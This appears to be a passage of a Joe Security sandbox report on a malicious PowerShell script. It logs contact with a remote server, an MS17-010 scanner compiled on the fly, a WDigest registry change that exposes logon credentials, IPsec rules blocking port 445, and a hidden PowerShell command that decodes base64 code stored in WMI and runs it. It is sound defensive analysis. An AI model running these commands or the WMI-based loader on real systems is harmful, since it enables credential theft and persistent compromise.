Timestamp Source IP Dest IP Checksum Code Type Jun 20, 2018 20:27:10.083206892 CEST 192.168.2.2 87.121.98.215 4d5a Echo Jun 20, 2018 20:27:10.127677917 CEST 87.121.98.215 192.168.2.2 555a Echo Reply Jun 20, 2018 20:27:11.161484003 CEST 192.168.2.2 87.121.98.215 4d59 Echo Jun 20, 2018 20:27:11.205857992 CEST 87.121.98.215 192.168.2.2 5559 Echo Reply Jun 20, 2018 20:27:12.232120037 CEST 192.168.2.2 87.121.98.215 4d58 Echo Jun 20, 2018 20:27:12.276514053 CEST 87.121.98.215 192.168.2.2 5558 Echo Reply Jun 20, 2018 20:27:13.314919949 CEST 192.168.2.2 87.121.98.215 4d57 Echo Jun 20, 2018 20:27:13.363086939 CEST 87.121.98.215 192.168.2.2 5557 Echo Reply Jun 20, 2018 20:28:14.766578913 CEST 192.168.2.2 87.121.98.215 4d56 Echo Jun 20, 2018 20:28:14.814902067 CEST 87.121.98.215 192.168.2.2 5556 Echo Reply Jun 20, 2018 20:28:15.850610018 CEST 192.168.2.2 87.121.98.215 4d55 Echo Jun 20, 2018 20:28:15.896051884 CEST 87.121.98.215 192.168.2.2 5555 Echo Reply Jun 20, 2018 20:28:16.924745083 CEST 192.168.2.2 87.121.98.215 4d54 Echo Jun 20, 2018 20:28:16.968987942 CEST 87.121.98.215 192.168.2.2 5554 Echo Reply Jun 20, 2018 20:28:18.008594036 CEST 192.168.2.2 87.121.98.215 4d53 Echo Jun 20, 2018 20:28:18.053158998 CEST 87.121.98.215 192.168.2.2 5553 Echo Reply
HTTP Request Dependency Graph
87.121.98.215:8000
HTTP Packets
Session ID Source IP Source Port Destination IP Destination Port Process 0 192.168.2.2 49163 87.121.98.215 8000 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
kBytes Timestamp transferred Direction Data Jun 20, 2018 3 OUT GET /ver.txt HTTP/1.1 20:28:18.456597090 CEST Host: 87.121.98.215:8000 Connection: Keep-Alive Jun 20, 2018 3 IN HTTP/1.1 200 OK 20:28:18.501296997 CEST Server: nginx/1.4.6 (Ubuntu) Date: Wed, 20 Jun 2018 18:28:11 GMT Content-Type: text/plain Content-Length: 4 Last-Modified: Fri, 15 Jun 2018 05:12:52 GMT Connection: keep-alive ETag: "5b234ad4-4" Accept-Ranges: bytes Data Raw: 31 2e 34 0a Data Ascii: 1.4
Copyright Joe Security LLC 2018 Page 17 of 28 kBytes Timestamp transferred Direction Data Jun 20, 2018 4 IN HTTP/1.1 200 OK 20:28:18.742770910 CEST Server: nginx/1.4.6 (Ubuntu) Date: Wed, 20 Jun 2018 18:28:11 GMT Content-Type: text/plain Content-Length: 4 Last-Modified: Fri, 15 Jun 2018 05:12:52 GMT Connection: keep-alive ETag: "5b234ad4-4" Accept-Ranges: bytes Data Raw: 31 2e 34 0a Data Ascii: 1.4
Code Manipulations
Statistics
Behavior
• powershell.exe • netsh.exe • netsh.exe • netsh.exe • netsh.exe • netsh.exe • netsh.exe • schtasks.exe • powercfg.exe • powercfg.exe • powercfg.exe • NETSTAT.EXE • csc.exe • NETSTAT.EXE • cvtres.exe • powershell.exe • NETSTAT.EXE • csc.exe • cvtres.exe
Click to jump to process
System Behavior
Analysis Process: powershell.exe PID: 3384 Parent PID: 2984
General
Start time: 20:26:44 Start date: 20/06/2018 Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Wow64 process (32bit): false Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -noLogo -ExecutionPolicy unrestricted -file 'C:\Users\user\Desktop\info6.ps1' Imagebase: 0x21e80000 File size: 452608 bytes MD5 hash: 92F44E405DB16AC55D97E3BFE3B132FA Has administrator privileges: true Programmed in: .Net C# or VB.NET Reputation: high
Copyright Joe Security LLC 2018 Page 18 of 28 File Activities
File Created
Source File Path Access Attributes Options Completion Count Address Symbol C:\Users\user\AppData\Local\Temp\rfy2neso.tmp read attributes | none synchronous io success or wait 1 16D072F CreateFileW synchronize | non alert | non generic write directory file | open no recall C:\Users\user\AppData\Local\Temp\rfy2neso.0.cs read attributes | none synchronous io success or wait 1 16D072F CreateFileW synchronize | non alert | non generic write directory file | open no recall C:\Users\user\AppData\Local\Temp\rfy2neso.dll read attributes | none synchronous io success or wait 1 16D072F CreateFileW synchronize | non alert | non generic read | directory file | generic write open no recall C:\Users\user\AppData\Local\Temp\rfy2neso.cmdline read attributes | none synchronous io success or wait 1 16D072F CreateFileW synchronize | non alert | non generic write directory file | open no recall C:\Users\user\AppData\Local\Temp\rfy2neso.out read attributes | none synchronous io success or wait 1 16D072F CreateFileW synchronize | non alert | non generic write directory file | open no recall C:\Users\user\AppData\Local\Temp\rfy2neso.err read attributes | none synchronous io success or wait 1 16D072F CreateFileW synchronize | non alert | non generic write directory file | open no recall
File Deleted
Source File Path Completion Count Address Symbol C:\Users\user\AppData\Local\Temp\rfy2neso.cmdline success or wait 1 16D01D2 DeleteFileW C:\Users\user\AppData\Local\Temp\rfy2neso.dll success or wait 1 16D01D2 DeleteFileW C:\Users\user\AppData\Local\Temp\rfy2neso.tmp success or wait 1 16D01D2 DeleteFileW C:\Users\user\AppData\Local\Temp\rfy2neso.0.cs success or wait 1 16D01D2 DeleteFileW
Source Old File Path New File Path Completion Count Address Symbol
File Written
Source File Path Offset Length Value Ascii Completion Count Address Symbol
Copyright Joe Security LLC 2018 Page 19 of 28 Source File Path Offset Length Value Ascii Completion Count Address Symbol C:\Users\user\AppData\Local\Temp\rfy2neso.0.cs unknown 4096 ef bb bf 75 73 69 6e 67 ...using System;..using success or wait 1 16D08E7 WriteFile 20 53 79 73 74 65 6d System 3b 0d 0a 75 73 69 6e .Collections.Generic;..usin 67 20 53 79 73 74 65 g S 6d 2e 43 6f 6c 6c 65 ystem.Diagnostics;..using 63 74 69 6f 6e 73 2e System.IO;..using 47 65 6e 65 72 69 63 System.Net;..using 3b 0d 0a 75 73 69 6e System.Net.Sockets;..usin 67 20 53 79 73 74 65 g 6d 2e 44 69 61 67 6e System.Text;....namespac 6f 73 74 69 63 73 3b e PingCastle.Scanners.. 0d 0a 75 73 69 6e 67 {...public class m17sc... 20 53 79 73 74 65 6d {....static public bool 2e 49 4f 3b 0d 0a 75 Scan(stri 73 69 6e 67 20 53 79 73 74 65 6d 2e 4e 65 74 3b 0d 0a 75 73 69 6e 67 20 53 79 73 74 65 6d 2e 4e 65 74 2e 53 6f 63 6b 65 74 73 3b 0d 0a 75 73 69 6e 67 20 53 79 73 74 65 6d 2e 54 65 78 74 3b 0d 0a 0d 0a 6e 61 6d 65 73 70 61 63 65 20 50 69 6e 67 43 61 73 74 6c 65 2e 53 63 61 6e 6e 65 72 73 0d 0a 7b 0d 0a 09 70 75 62 6c 69 63 20 63 6c 61 73 73 20 6d 31 37 73 63 0d 0a 09 7b 0d 0a 09 09 73 74 61 74 69 63 20 70 75 62 6c 69 63 20 62 6f 6f 6c 20 53 63 61 6e 28 73 74 72 69 C:\Users\user\AppData\Local\Temp\rfy2neso.0.cs unknown 1730 64 65 72 20 3d 20 6e der = new success or wait 1 16D08E7 WriteFile 65 77 20 42 69 6e 61 BinaryReader(ms);... 72 79 52 65 61 64 65 ..byte[] part1 = new byte[] 72 28 6d 73 29 3b 0d {...... 0x00,0x00,0x00,0x00, 0a 09 09 09 62 79 74 ...... 0xff,0x53,0x4d,0x42, 65 5b 5d 20 70 61 72 ...... 0x75, ...... 0x00, 74 31 20 3d 20 6e 65 ...... 0x00, ...... 0x00,0x00, 77 20 62 79 74 65 5b ...... 0x18, ...... 0x01,0x28, 5d 20 7b 0d 0a 09 09 ...... 0x00,0x00, 09 09 30 78 30 30 2c ...... 0x00,0x00,0x00,0x00,0 30 78 30 30 2c 30 78 x00,0x00,0x00,0x 30 30 2c 30 78 30 30 2c 20 0d 0a 09 09 09 09 30 78 66 66 2c 30 78 35 33 2c 30 78 34 64 2c 30 78 34 32 2c 20 0d 0a 09 09 09 09 30 78 37 35 2c 20 0d 0a 09 09 09 09 30 78 30 30 2c 20 0d 0a 09 09 09 09 30 78 30 30 2c 20 0d 0a 09 09 09 09 30 78 30 30 2c 30 78 30 30 2c 20 0d 0a 09 09 09 09 30 78 31 38 2c 20 0d 0a 09 09 09 09 30 78 30 31 2c 30 78 32 38 2c 20 0d 0a 09 09 09 09 30 78 30 30 2c 30 78 30 30 2c 20 0d 0a 09 09 09 09 30 78 30 30 2c 30 78 30 30 2c 30 78 30 30 2c 30 78 30 30 2c 30 78 30 30 2c 30 78 30 30 2c 30 78 30 30 2c 30 78
Copyright Joe Security LLC 2018 Page 20 of 28 Source File Path Offset Length Value Ascii Completion Count Address Symbol C:\Users\user\AppData\Local\Temp\rfy2neso.cmdline unknown 327 ef bb bf 2f 74 3a 6c 69 .../t:library /utf8output /R:" success or wait 1 16D08E7 WriteFile 62 72 61 72 79 20 2f System.dll" 75 74 66 38 6f 75 74 /R:"C:\Windows\ass 70 75 74 20 2f 52 3a embly\GAC_MSIL\System. 22 53 79 73 74 65 6d Manageme 2e 64 6c 6c 22 20 2f nt.Automation\1.0.0.0__31 52 3a 22 43 3a 5c 57 bf385 69 6e 64 6f 77 73 5c 6ad364e35\System.Manag 61 73 73 65 6d 62 6c ement.Automation.dll" 79 5c 47 41 43 5f 4d /out:"C:\Users\u 53 49 4c 5c 53 79 73 ser\AppData\Local\Temp\rf 74 65 6d 2e 4d 61 6e y2neso.dll" /D:DEBUG 61 67 65 6d 65 6e 74 /debug+ /optimize- 2e 41 75 74 6f 6d 61 74 69 6f 6e 5c 31 2e 30 2e 30 2e 30 5f 5f 33 31 62 66 33 38 35 36 61 64 33 36 34 65 33 35 5c 53 79 73 74 65 6d 2e 4d 61 6e 61 67 65 6d 65 6e 74 2e 41 75 74 6f 6d 61 74 69 6f 6e 2e 64 6c 6c 22 20 2f 6f 75 74 3a 22 43 3a 5c 55 73 65 72 73 5c 48 65 72 62 20 42 6c 61 63 6b 62 75 72 6e 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 54 65 6d 70 5c 72 66 79 32 6e 65 73 6f 2e 64 6c 6c 22 20 2f 44 3a 44 45 42 55 47 20 2f 64 65 62 75 67 2b 20 2f 6f 70 74 69 6d 69 7a 65 2d 20 C:\Users\user\AppData\Local\Temp\rfy2neso.out unknown 422 ef bb bf 43 3a 5c 55 73 ...C:\Users\user\Desktop> success or wait 1 16D08E7 WriteFile 65 72 73 5c 48 65 72 "C:\ 62 20 42 6c 61 63 6b Windows\Microsoft.NET\Fr 62 75 72 6e 5c 44 65 amewor 73 6b 74 6f 70 3e 20 k\v2.0.50727\csc.exe" 22 43 3a 5c 57 69 6e /t:library /utf8output 64 6f 77 73 5c 4d 69 /R:"System.dll" 63 72 6f 73 6f 66 74 2e /R:"C:\Windows\assembly\ 4e 45 54 5c 46 72 61 GAC_M 6d 65 77 6f 72 6b 5c SIL\System.Management. 76 32 2e 30 2e 35 30 Automati 37 32 37 5c 63 73 63 on\1.0.0.0__31bf3856ad36 2e 65 78 65 22 20 2f 4e35\S 74 3a 6c 69 62 72 61 ystem.Management.Autom 72 79 20 2f 75 74 66 ation.dll" /o 38 6f 75 74 70 75 74 20 2f 52 3a 22 53 79 73 74 65 6d 2e 64 6c 6c 22 20 2f 52 3a 22 43 3a 5c 57 69 6e 64 6f 77 73 5c 61 73 73 65 6d 62 6c 79 5c 47 41 43 5f 4d 53 49 4c 5c 53 79 73 74 65 6d 2e 4d 61 6e 61 67 65 6d 65 6e 74 2e 41 75 74 6f 6d 61 74 69 6f 6e 5c 31 2e 30 2e 30 2e 30 5f 5f 33 31 62 66 33 38 35 36 61 64 33 36 34 65 33 35 5c 53 79 73 74 65 6d 2e 4d 61 6e 61 67 65 6d 65 6e 74 2e 41 75 74 6f 6d 61 74 69 6f 6e 2e 64 6c 6c 22 20 2f 6f
File Read
Source File Path Offset Length Completion Count Address Symbol C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config unknown 4095 success or wait 1 6C9EC01C unknown C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config unknown 6304 success or wait 3 6C9EC01C unknown C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config unknown 4106 success or wait 1 6C9EC01C unknown C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch unknown 48 success or wait 1 6C9AAC6F ReadFile C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch unknown 48 success or wait 1 6C9AAC6F ReadFile C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config unknown 4095 success or wait 1 6C9EF210 ReadFile
Copyright Joe Security LLC 2018 Page 21 of 28 Source File Path Offset Length Completion Count Address Symbol C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config unknown 6304 success or wait 3 6C9EF210 ReadFile C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config unknown 4106 success or wait 1 6C9EF210 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\getevent.types.ps1xml unknown 4096 success or wait 4 16D08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\getevent.types.ps1xml unknown 781 end of file 1 16D08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\getevent.types.ps1xml unknown 4096 end of file 1 16D08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml unknown 4096 success or wait 42 16D08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml unknown 4096 end of file 1 16D08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml unknown 4096 success or wait 7 16D08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml unknown 542 end of file 1 16D08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml unknown 4096 end of file 1 16D08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.Format.ps1xml unknown 4096 success or wait 6 16D08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.Format.ps1xml unknown 78 end of file 1 16D08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.Format.ps1xml unknown 4096 end of file 1 16D08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml unknown 4096 success or wait 7 16D08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml unknown 310 end of file 1 16D08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml unknown 4096 end of file 1 16D08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml unknown 4096 success or wait 18 16D08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml unknown 50 end of file 1 16D08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml unknown 4096 end of file 1 16D08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml unknown 4096 success or wait 7 16D08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml unknown 4096 end of file 1 16D08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml unknown 4096 success or wait 63 16D08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml unknown 201 end of file 1 16D08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml unknown 4096 end of file 1 16D08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml unknown 4096 success or wait 22 16D08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml unknown 409 end of file 1 16D08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml unknown 4096 end of file 1 16D08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml unknown 4096 success or wait 5 16D08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml unknown 844 end of file 1 16D08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml unknown 4096 end of file 1 16D08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml unknown 4096 success or wait 5 16D08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml unknown 360 end of file 1 16D08E7 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml unknown 4096 end of file 1 16D08E7 ReadFile C:\Users\user\Desktop\info6.ps1 unknown 4096 success or wait 1041 16D08E7 ReadFile C:\Users\user\Desktop\info6.ps1 unknown 532 end of file 1 16D08E7 ReadFile C:\Users\user\Desktop\info6.ps1 unknown 4096 end of file 1 16D08E7 ReadFile C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1. unknown 4096 success or wait 1 6CA69FDE unknown 0.0.0__31bf3856ad364e35\System.Management.Automation.dll C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1. unknown 512 success or wait 1 6CA69FDE unknown 0.0.0__31bf3856ad364e35\System.Management.Automation.dll C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1. unknown 512 success or wait 1 6CA69FDE unknown 0.0.0__31bf3856ad364e35\System.Management.Automation.dll C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1. unknown 512 success or wait 1 6CA69FDE unknown 0.0.0__31bf3856ad364e35\System.Management.Automation.dll C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1. unknown 512 success or wait 1 6CA69FDE unknown 0.0.0__31bf3856ad364e35\System.Management.Automation.dll C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll unknown 4096 success or wait 1 6CA69FDE unknown C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll unknown 512 success or wait 1 6CA69FDE unknown C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll unknown 512 success or wait 1 6CA69FDE unknown C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll unknown 512 success or wait 1 6CA69FDE unknown C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll unknown 512 success or wait 1 6CA69FDE unknown unknown unknown 4096 success or wait 3 16D08E7 ReadFile unknown unknown 4096 pipe broken 2 16D08E7 ReadFile C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config unknown 4096 success or wait 1 16D08E7 ReadFile C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config unknown 4096 success or wait 1 16D08E7 ReadFile C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config unknown 4096 success or wait 2 16D08E7 ReadFile C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config unknown 4096 success or wait 1 16D08E7 ReadFile C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config unknown 4096 success or wait 1 16D08E7 ReadFile C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config unknown 4096 success or wait 1 16D08E7 ReadFile C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config unknown 4096 end of file 1 16D08E7 ReadFile C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.U unknown 4096 success or wait 1 6CA69FDE unknown tility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.U unknown 512 success or wait 1 6CA69FDE unknown tility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.U unknown 512 success or wait 1 6CA69FDE unknown tility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll Copyright Joe Security LLC 2018 Page 22 of 28 Source File Path Offset Length Completion Count Address Symbol
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.U unknown 512 success or wait 1 6CA69FDE unknown tility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.U unknown 512 success or wait 1 6CA69FDE unknown tility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll
Registry Activities
Source Key Path Completion Count Address Symbol
Key Value Created
Source Key Path Name Type Data Completion Count Address Symbol HKEY_LOCAL_MACHINE\SYSTEM\Cont UseLogonCredential dword 1 success or wait 1 16D4F7A RegSetValueExW rolSet001\Control\SecurityProviders\WDigest
Analysis Process: netsh.exe PID: 3604 Parent PID: 3384
General
Start time: 20:27:26 Start date: 20/06/2018 Path: C:\Windows\System32\netsh.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\netsh.exe' ipsec static add policy name=netbc Imagebase: 0x1690000 File size: 96256 bytes MD5 hash: 784A50A6A09C25F011C3143DDD68E729 Has administrator privileges: true Programmed in: C, C++ or other language Reputation: moderate
Registry Activities
Source Key Path Completion Count Address Symbol
Source Key Path Name Type Data Completion Count Address Symbol
Analysis Process: netsh.exe PID: 3620 Parent PID: 3384
General
Start time: 20:27:27 Start date: 20/06/2018 Path: C:\Windows\System32\netsh.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\netsh.exe' ipsec static add filterlist name=block Imagebase: 0x1690000 File size: 96256 bytes MD5 hash: 784A50A6A09C25F011C3143DDD68E729 Has administrator privileges: true Programmed in: C, C++ or other language Reputation: moderate
Registry Activities
Copyright Joe Security LLC 2018 Page 23 of 28 Source Key Path Completion Count Address Symbol
Source Key Path Name Type Data Completion Count Address Symbol
Analysis Process: netsh.exe PID: 3648 Parent PID: 3384
General
Start time: 20:27:28 Start date: 20/06/2018 Path: C:\Windows\System32\netsh.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\netsh.exe' ipsec static add filteraction name=block action=block Imagebase: 0x1690000 File size: 96256 bytes MD5 hash: 784A50A6A09C25F011C3143DDD68E729 Has administrator privileges: true Programmed in: C, C++ or other language Reputation: moderate
Analysis Process: netsh.exe PID: 3696 Parent PID: 3384
General
Start time: 20:27:28 Start date: 20/06/2018 Path: C:\Windows\System32\netsh.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\netsh.exe' ipsec static add filter filterlist=block any srcmask=32 s rcport=0 dstaddr=me dstport=445 protocol=tcp description=445 Imagebase: 0x1690000 File size: 96256 bytes MD5 hash: 784A50A6A09C25F011C3143DDD68E729 Has administrator privileges: true Programmed in: C, C++ or other language Reputation: moderate
Analysis Process: netsh.exe PID: 3716 Parent PID: 3384
General
Start time: 20:27:29 Start date: 20/06/2018 Path: C:\Windows\System32\netsh.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\netsh.exe' ipsec static add rule name=block policy=netbc filterlist= block filteraction=block Imagebase: 0x1690000 File size: 96256 bytes MD5 hash: 784A50A6A09C25F011C3143DDD68E729 Has administrator privileges: true Programmed in: C, C++ or other language Reputation: moderate
Analysis Process: netsh.exe PID: 3748 Parent PID: 3384 Copyright Joe Security LLC 2018 Page 24 of 28 General
Start time: 20:27:29 Start date: 20/06/2018 Path: C:\Windows\System32\netsh.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\netsh.exe' ipsec static set policy name=netbc assign=y Imagebase: 0x1690000 File size: 96256 bytes MD5 hash: 784A50A6A09C25F011C3143DDD68E729 Has administrator privileges: true Programmed in: C, C++ or other language Reputation: moderate
Analysis Process: schtasks.exe PID: 3940 Parent PID: 3384
General
Start time: 20:27:43 Start date: 20/06/2018 Path: C:\Windows\System32\schtasks.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\schtasks.exe' /delete /tn yastcat /f Imagebase: 0xb00000 File size: 179712 bytes MD5 hash: 2003E9B15E1C502B146DAD2E383AC1E3 Has administrator privileges: true Programmed in: C, C++ or other language Reputation: moderate
Analysis Process: powercfg.exe PID: 3952 Parent PID: 3384
General
Start time: 20:27:43 Start date: 20/06/2018 Path: C:\Windows\System32\powercfg.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\powercfg.exe' /CHANGE -standby-timeout-ac 0 Imagebase: 0xdc0000 File size: 59392 bytes MD5 hash: 98E7E971AB21A6EDD2323C0FB37B9A0F Has administrator privileges: true Programmed in: C, C++ or other language Reputation: low
Analysis Process: powercfg.exe PID: 3960 Parent PID: 3384
General
Start time: 20:27:44 Start date: 20/06/2018 Path: C:\Windows\System32\powercfg.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\powercfg.exe' /CHANGE -hibernate-timeout-ac 0 Imagebase: 0xdc0000 File size: 59392 bytes MD5 hash: 98E7E971AB21A6EDD2323C0FB37B9A0F
Copyright Joe Security LLC 2018 Page 25 of 28 Has administrator privileges: true Programmed in: C, C++ or other language Reputation: low
Analysis Process: powercfg.exe PID: 3968 Parent PID: 3384
General
Start time: 20:27:44 Start date: 20/06/2018 Path: C:\Windows\System32\powercfg.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\powercfg.exe' -SetAcValueIndex 381b4222-f694-41f0-9685-ff5 bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c 936 000 Imagebase: 0xdc0000 File size: 59392 bytes MD5 hash: 98E7E971AB21A6EDD2323C0FB37B9A0F Has administrator privileges: true Programmed in: C, C++ or other language Reputation: low
Analysis Process: NETSTAT.EXE PID: 3980 Parent PID: 3384
General
Start time: 20:27:45 Start date: 20/06/2018 Path: C:\Windows\System32\NETSTAT.EXE Wow64 process (32bit): false Commandline: 'C:\Windows\system32\NETSTAT.EXE' -anop tcp Imagebase: 0xf10000 File size: 27136 bytes MD5 hash: 32297BB17E6EC700D0FC869F9ACAF561 Has administrator privileges: true Programmed in: C, C++ or other language Reputation: moderate
Analysis Process: csc.exe PID: 2140 Parent PID: 3384
General
Start time: 20:28:06 Start date: 20/06/2018 Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe Wow64 process (32bit): false Commandline: 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\us er\AppData\Local\Temp\rfy2neso.cmdline' Imagebase: 0x400000 File size: 77960 bytes MD5 hash: 0A1C81BDCB030222A0B0A652B2C89D8D Has administrator privileges: true Programmed in: .Net C# or VB.NET Reputation: moderate
Analysis Process: NETSTAT.EXE PID: 2180 Parent PID: 3384
Copyright Joe Security LLC 2018 Page 26 of 28 General
Start time: 20:28:06 Start date: 20/06/2018 Path: C:\Windows\System32\NETSTAT.EXE Wow64 process (32bit): false Commandline: 'C:\Windows\system32\NETSTAT.EXE' -anop tcp Imagebase: 0xad0000 File size: 27136 bytes MD5 hash: 32297BB17E6EC700D0FC869F9ACAF561 Has administrator privileges: true Programmed in: C, C++ or other language Reputation: moderate
Analysis Process: cvtres.exe PID: 2212 Parent PID: 2140
General
Start time: 20:28:07 Start date: 20/06/2018 Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe Wow64 process (32bit): false Commandline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACH INE:IX86 '/OUT:C:\Users\HERBBL~1\AppData\Local\Temp\RES501D.tmp' 'c:\Users\user\ AppData\Local\Temp\CSC4E3C.tmp' Imagebase: 0x400000 File size: 32912 bytes MD5 hash: 200FC355F85ECD4DB77FB3CAB2D01364 Has administrator privileges: true Programmed in: C, C++ or other language Reputation: moderate
Analysis Process: powershell.exe PID: 2524 Parent PID: 3384
General
Start time: 20:28:08 Start date: 20/06/2018 Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Wow64 process (32bit): false Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -NonI -W Hidden '$mon = ([WmiClass] 'root\default:coredpussvr').Properties['mon'].Value;$funs = ([WmiClass] 'root\default:coredpussvr').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCI I.GetString([System.Convert]::FromBase64String($funs)));Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($mon, $mon, 'Void', 0, '', '')' Imagebase: 0x21e80000 File size: 452608 bytes MD5 hash: 92F44E405DB16AC55D97E3BFE3B132FA Has administrator privileges: true Programmed in: .Net C# or VB.NET Reputation: high
Analysis Process: NETSTAT.EXE PID: 2696 Parent PID: 3384
General
Start time: 20:28:27 Start date: 20/06/2018 Path: C:\Windows\System32\NETSTAT.EXE Wow64 process (32bit): false
Copyright Joe Security LLC 2018 Page 27 of 28 Commandline: 'C:\Windows\system32\NETSTAT.EXE' -anop tcp Imagebase: 0xe30000 File size: 27136 bytes MD5 hash: 32297BB17E6EC700D0FC869F9ACAF561 Has administrator privileges: true Programmed in: C, C++ or other language Reputation: moderate
Analysis Process: csc.exe PID: 2644 Parent PID: 2524
General
Start time: 20:28:40 Start date: 20/06/2018 Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe Wow64 process (32bit): false Commandline: 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\us er\AppData\Local\Temp\cvkkx-1q.cmdline' Imagebase: 0x400000 File size: 77960 bytes MD5 hash: 0A1C81BDCB030222A0B0A652B2C89D8D Has administrator privileges: true Programmed in: .Net C# or VB.NET Reputation: moderate
